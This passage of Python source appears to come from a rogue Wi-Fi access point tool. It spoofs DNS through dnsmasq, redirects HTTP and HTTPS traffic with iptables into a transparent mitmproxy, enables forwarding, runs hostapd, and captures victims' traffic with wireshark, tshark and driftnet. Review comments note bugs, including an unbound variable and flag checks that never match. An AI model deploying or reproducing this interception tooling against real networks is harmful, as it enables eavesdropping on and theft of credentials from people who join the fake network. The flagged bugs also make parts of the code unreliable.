                os.system("sudo cp /etc/dnsmasq.conf /etc/dnsmasq.conf.backup")
                for no_ssl_dns_line in all_dns["no_ssl"]:
                    # NOTE(review): ssl_dns_line is never bound in this branch,
                    # so this raises NameError (caught below, then stop_ap
                    # runs); the loop variable no_ssl_dns_line was presumably
                    # intended.
                    os.system("sudo echo -e '" + ssl_dns_line + "' >> " + script_path + "src/dns2proxy/spoof.cfg")
                    append_file("/etc/dnsmasq.conf", no_ssl_dns_line)
            else:
                print_info("Skipping..")
            #/DNSMASQ DNS SPOOFING
            start_dns_masq()
            # #MITMPROXY MODE
            proxy_if = proxy_if.lower()
            if proxy_if != "no":
                if proxy_if == "nossl":
                    os.system(
                        "sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080"
                    )
                else:
                    print(
                        "To install the certificate, go to 'http://mitm.it/' through the proxy, and choose your OS."
                    )
                    os.system(
                        "sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080"
                    )
                    os.system(
                        "sudo iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080"
                    )
                os.system(
                    "sudo sysctl -w net.ipv4.ip_forward=1 > /dev/null 2>&1")
                print("Starting AP on " + ap_iface + " in screen terminal...")
                # NOTE(review): the three flags were converted to bool above,
                # so these string comparisons are always False and the
                # wireshark/driftnet/tshark branches never run in proxy mode.
                if wireshark_if == "y" or wireshark_if == "":
                    print("Starting WIRESHARK...")
                    os.system(
                        "sudo screen -S mitmap-wireshark -m -d wireshark -i " + ap_iface + " -k -w " + script_path + "logs/mitmap-wireshark.pcap")
                if driftnet_if == "y" or driftnet_if == "":
                    print("Starting DRIFTNET...")
                    os.system(
                        "sudo screen -S mitmap-driftnet -m -d driftnet -i " + ap_iface)
                if tshark_if == "y" or tshark_if == "":
                    print("Starting TSHARK...")
                    os.system("sudo screen -S mitmap-tshark -m -d tshark -i " + ap_iface + " -w " + script_path + "logs/mitmap-tshark.pcap")
                os.system(
                    "sudo screen -S mitmap-hostapd -m -d hostapd /etc/hostapd/hostapd.conf"
                )
                print(
                    "\nStarting MITMPROXY in 5 seconds... (press q and y to exit)\n"
                )
                try:
                    time.sleep(5)
                except:
                    print("")
                # mitmproxy runs in the foreground; returning here ends the run
                os.system("sudo mitmproxy -T --host --follow -w " + script_path + "logs/mitmap-proxy.mitmproxy")
                #STARTING POINT
            else:
                print("Skipping proxy...")
                # #/MITMPROXY MODE
                start_services(ap_iface, script_path, wireshark_if, driftnet_if, tshark_if)
                os.system("sudo sysctl -w net.ipv4.ip_forward=1 > /dev/null 2>&1")
                print_info("Starting AP on " + ap_iface + "...\n")
                # hostapd in the foreground; Ctrl-C ends it and the run
                os.system("sudo hostapd /etc/hostapd/hostapd.conf")
                print_ok("Done")
                #STARTING POINT
    except KeyboardInterrupt:
        pass
    except Exception as e:
        print_error(e)
    finally:
        stop_ap(ap_iface, net_iface, channel, sslstrip_if, hostapd_wpa, driftnet_if, ssid, wireshark_if, tshark_if, dns_if, script_path)